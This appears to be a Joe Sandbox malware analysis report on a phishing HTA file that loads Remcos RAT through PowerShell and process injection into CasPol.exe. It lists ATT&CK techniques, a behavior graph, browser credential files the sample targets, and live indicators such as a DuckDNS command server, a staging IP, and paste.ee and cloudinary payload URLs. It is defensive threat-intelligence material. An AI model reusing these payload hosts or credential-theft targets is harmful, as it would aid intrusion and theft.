                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00404915 GetLocalTime,CreateEventA,CreateThread,12_2_00404915
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A7A2 GetComputerNameExW,GetUserNameW,12_2_0041A7A2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00448057 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,12_2_00448057
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 7.2.powershell.exe.63d2830.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.powershell.exe.63d2830.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4168215268.000000000258F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2097314015.0000000006332000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6312, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6456, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040B21B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db12_2_0040B335

                        Remote Access Functionality

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-GH3PRLJump to behavior
                        Source: Yara matchFile source: 7.2.powershell.exe.63d2830.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.powershell.exe.63d2830.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4168215268.000000000258F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2097314015.0000000006332000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6312, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6456, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe12_2_00405042
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information111
                        Scripting
                        Valid Accounts1
                        Native API
                        111
                        Scripting
                        1
                        DLL Side-Loading
                        1
                        Deobfuscate/Decode Files or Information
                        1
                        OS Credential Dumping
                        2
                        System Time Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Web Service
                        Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution
                        1
                        DLL Side-Loading
                        1
                        Bypass User Account Control
                        2
                        Obfuscated Files or Information
                        211
                        Input Capture
                        1
                        Account Discovery
                        Remote Desktop Protocol1
                        Email Collection
                        12
                        Ingress Tool Transfer
                        Exfiltration Over Bluetooth1
                        Defacement
                        Email AddressesDNS ServerDomain Accounts13
                        Command and Scripting Interpreter
                        1
                        Windows Service
                        1
                        Access Token Manipulation
                        1
                        DLL Side-Loading
                        2
                        Credentials In Files
                        1
                        System Service Discovery
                        SMB/Windows Admin Shares211
                        Input Capture
                        21
                        Encrypted Channel
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        Service Execution
                        Login Hook1
                        Windows Service
                        1
                        Bypass User Account Control
                        NTDS3
                        File and Directory Discovery
                        Distributed Component Object Model3
                        Clipboard Data
                        1
                        Remote Access Software
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts3
                        PowerShell
                        Network Logon Script222
                        Process Injection
                        1
                        Masquerading
                        LSA Secrets34
                        System Information Discovery
                        SSHKeylogging2
                        Non-Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                        Virtualization/Sandbox Evasion
                        Cached Domain Credentials21
                        Security Software Discovery
                        VNCGUI Input Capture213
                        Application Layer Protocol
                        Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Access Token Manipulation
                        DCSync21
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job222
                        Process Injection
                        Proc Filesystem3
                        Process Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        Application Window Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                        System Owner/User Discovery
                        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576453 Sample: sweetnesswithgreatnessiwthb... Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 53 submarrine.duckdns.org 2->53 55 paste.ee 2->55 57 2 other IPs or domains 2->57 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Malicious sample detected (through community Yara rule) 2->69 75 17 other signatures 2->75 11 mshta.exe 1 2->11         started        signatures3 71 Uses dynamic DNS services 53->71 73 Connects to a pastebin service (likely for C&C) 55->73 process4 signatures5 95 Suspicious command line found 11->95 97 PowerShell case anomaly found 11->97 14 cmd.exe 1 11->14         started        process6 signatures7 99 Detected Cobalt Strike Beacon 14->99 101 Suspicious powershell command line found 14->101 103 Wscript starts Powershell (via cmd or directly) 14->103 105 PowerShell case anomaly found 14->105 17 powershell.exe 42 14->17         started        22 conhost.exe 14->22         started        process8 dnsIp9 51 23.95.235.29, 49730, 80 AS-COLOCROSSINGUS United States 17->51 43 weareusinggoodcomp...fitingbesthings.vbS, Unicode 17->43 dropped 45 C:\Users\user\AppData\...\xduntapu.cmdline, Unicode 17->45 dropped 77 Loading BitLocker PowerShell Module 17->77 24 wscript.exe 1 17->24         started        27 csc.exe 3 17->27         started        file10 signatures11 process12 file13 87 Detected Cobalt Strike Beacon 24->87 89 Suspicious powershell command line found 24->89 91 Wscript starts Powershell (via cmd or directly) 24->91 93 2 other signatures 24->93 30 powershell.exe 15 16 24->30         started        49 C:\Users\user\AppData\Local\...\xduntapu.dll, PE32 27->49 dropped 34 cvtres.exe 1 27->34         started        signatures14 process15 dnsIp16 61 cloudinary.map.fastly.net 151.101.193.137, 443, 49731 FASTLYUS United States 30->61 63 paste.ee 172.67.187.200, 443, 49738 CLOUDFLARENETUS United States 30->63 107 Writes to foreign memory regions 30->107 109 Injects a PE file into a foreign processes 30->109 36 CasPol.exe 3 3 30->36         started        41 conhost.exe 30->41         started        signatures17 process18 dnsIp19 59 submarrine.duckdns.org 192.169.69.26, 49739, 49740, 49753 WOWUS United States 36->59 47 C:\ProgramData\remcos\logs.dat, data 36->47 dropped 79 Contains functionality to bypass UAC (CMSTPLUA) 36->79 81 Detected Remcos RAT 36->81 83 Contains functionalty to change the wallpaper 36->83 85 5 other signatures 36->85 file20 signatures21

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta26%VirustotalBrowse
                        sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta16%ReversingLabsScript-JS.Phishing.Generic
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        submarrine.duckdns.org1%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFT0%Avira URL Cloudsafe
                        http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFpaniesforgifitingbe0%Avira URL Cloudsafe
                        https://go.S0%Avira URL Cloudsafe
                        http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFP0%Avira URL Cloudsafe
                        https://go.SmbShare.cdxml=393270%Avira URL Cloudsafe
                        http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFf0%Avira URL Cloudsafe
                        http://23.95.235.29/439/weareusi0%Avira URL Cloudsafe
                        http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIF20%Avira URL Cloudsafe
                        http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFCA0%Avira URL Cloudsafe
                        submarrine.duckdns.org100%Avira URL Cloudmalware
                        http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIF0%Avira URL Cloudsafe
                        http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFC:0%Avira URL Cloudsafe
                        http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFRLLMEM0%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        paste.ee
                        172.67.187.200
                        truefalse
                          high
                          cloudinary.map.fastly.net
                          151.101.193.137
                          truefalse
                            high
                            submarrine.duckdns.org
                            192.169.69.26
                            truetrueunknown
                            res.cloudinary.com
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://paste.ee/r/HtMmw/0false
                                high
                                submarrine.duckdns.orgtrue
                                • Avira URL Cloud: malware
                                unknown
                                http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFtrue
                                • Avira URL Cloud: safe
                                unknown
                                https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFTpowershell.exe, 00000003.00000002.1834189157.0000000008800000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1829991352.0000000006278000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1827619214.0000000005368000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2097314015.00000000045B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1827619214.0000000005368000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2097314015.00000000045B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://go.micropowershell.exe, 00000003.00000002.1827619214.0000000005996000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFPpowershell.exe, 00000003.00000002.1832186474.0000000007862000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://contoso.com/Licensepowershell.exe, 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFpaniesforgifitingbepowershell.exe, 00000003.00000002.1832186474.0000000007862000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://contoso.com/Iconpowershell.exe, 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://go.Spowershell.exe, 00000003.00000002.1826688509.00000000033AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://go.SmbShare.cdxml=39327powershell.exe, 00000003.00000002.1826688509.00000000033AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFfpowershell.exe, 00000003.00000002.1832186474.0000000007862000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://23.95.235.29/439/weareusipowershell.exe, 00000003.00000002.1827619214.00000000056FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://go.microspowershell.exe, 00000003.00000002.1827619214.0000000005996000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2097314015.00000000045B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://geoplugin.net/json.gpCasPol.exefalse
                                                        high
                                                        http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIF2powershell.exe, 00000003.00000002.1834189157.0000000008800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFCApowershell.exe, 00000003.00000002.1832186474.0000000007862000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://res.cloudinary.compowershell.exe, 00000007.00000002.2097314015.00000000045B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://geoplugin.net/json.gp/Cpowershell.exe, 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2097314015.0000000006332000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            high
                                                            https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1827619214.0000000005211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2097314015.0000000004461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgtpowershell.exe, 00000007.00000002.2097314015.00000000045B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFC:powershell.exe, 00000003.00000002.1826688509.00000000033AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1827619214.0000000005368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://contoso.com/powershell.exe, 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1829991352.0000000006278000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFRLLMEMpowershell.exe, 00000003.00000002.1826688509.00000000033E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1827619214.0000000005211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2097314015.0000000004461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://github.com/dahall/taskschedulerpowershell.exe, 00000007.00000002.2097314015.000000000600C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          172.67.187.200
                                                                          paste.eeUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          23.95.235.29
                                                                          unknownUnited States
                                                                          36352AS-COLOCROSSINGUStrue
                                                                          151.101.193.137
                                                                          cloudinary.map.fastly.netUnited States
                                                                          54113FASTLYUSfalse
                                                                          192.169.69.26
                                                                          submarrine.duckdns.orgUnited States
                                                                          23033WOWUStrue
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1576453
                                                                          Start date and time:2024-12-17 07:20:12 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 9m 7s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:14
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta
                                                                          Detection:MAL
                                                                          Classification:mal100.rans.phis.troj.spyw.expl.evad.winHTA@18/17@5/4
                                                                          EGA Information:
                                                                          • Successful, ratio: 75%
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 63
                                                                          • Number of non-executed functions: 182
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .hta
                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target mshta.exe, PID 7060 because there are no executed function
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          TimeTypeDescription
                                                                          01:21:08API Interceptor123x Sleep call for process: powershell.exe modified
                                                                          01:22:17API Interceptor4262132x Sleep call for process: CasPol.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          172.67.187.200geHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                                          • paste.ee/d/1QtpX
                                                                          MT103-8819006.DOCS.vbsGet hashmaliciousUnknownBrowse
                                                                          • paste.ee/d/rYCH1
                                                                          LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                          • paste.ee/d/0jfAN
                                                                          PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                          • paste.ee/d/tiRif
                                                                          EWW.vbsGet hashmaliciousUnknownBrowse
                                                                          • paste.ee/d/gFlKP
                                                                          ODC#PO 4500628950098574654323567875765674433##633.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • paste.ee/d/JxxYu
                                                                          Purchase Order PO0193832.vbsGet hashmaliciousUnknownBrowse
                                                                          • paste.ee/d/Bpplq
                                                                          Name.vbsGet hashmaliciousUnknownBrowse
                                                                          • paste.ee/d/0kkOm
                                                                          517209487.vbsGet hashmaliciousXWormBrowse
                                                                          • paste.ee/d/s0kJG
                                                                          screen_shots.vbsGet hashmaliciousXWormBrowse
                                                                          • paste.ee/d/GoCAw
                                                                          23.95.235.29Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
                                                                          • 23.95.235.29/439/wse/sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta
                                                                          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
                                                                          • 23.95.235.29/439/wse/sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta
                                                                          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
                                                                          • 23.95.235.29/439/wse/sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta
                                                                          NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                          • 23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta
                                                                          greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                          • 23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF
                                                                          Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                          • 23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta
                                                                          nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                          • 23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF
                                                                          invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                          • 23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
                                                                          Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                          • 23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          paste.eecreatedbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                          • 104.21.84.67
                                                                          givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                          • 104.21.84.67
                                                                          clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                          • 172.67.187.200
                                                                          PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                          • 104.21.84.67
                                                                          NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                          • 188.114.96.6
                                                                          greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                          • 104.21.84.67
                                                                          goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                          • 172.67.187.200
                                                                          creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                          • 104.21.84.67
                                                                          Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                          • 188.114.97.6
                                                                          SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 188.114.97.6
                                                                          cloudinary.map.fastly.netcreatedbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                          • 151.101.1.137
                                                                          PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                          • 151.101.193.137
                                                                          NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                          • 151.101.193.137
                                                                          greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                          • 151.101.1.137
                                                                          goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                          • 151.101.1.137
                                                                          creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                          • 151.101.1.137
                                                                          Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                          • 151.101.129.137
                                                                          Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                          • 151.101.1.137
                                                                          stage2.ps1Get hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                          • 151.101.193.137
                                                                          nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                          • 151.101.1.137
                                                                          submarrine.duckdns.orggreatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                          • 192.3.101.149
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          WOWUS1734388385543fca13ccf5614dc71c1922a5cd8cddeb80fc9e4bce55f618d2232c3744cd06117.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 192.169.69.26
                                                                          x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                          • 192.169.69.26
                                                                          zvXPSu3dK5.exeGet hashmaliciousAsyncRATBrowse
                                                                          • 192.169.69.26
                                                                          173398584769f9c5bcf28a71f77fba1335e77fe6b4cc4f05afc05fdd9f5830429be0bc9fb5758.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 192.169.69.26
                                                                          nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                          • 192.169.69.26
                                                                          1733858044e64c59622ab494dda2ff98fce76991f7e15e513d6a3620e7f58ad7cc67d3889c571.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                          • 192.169.69.26
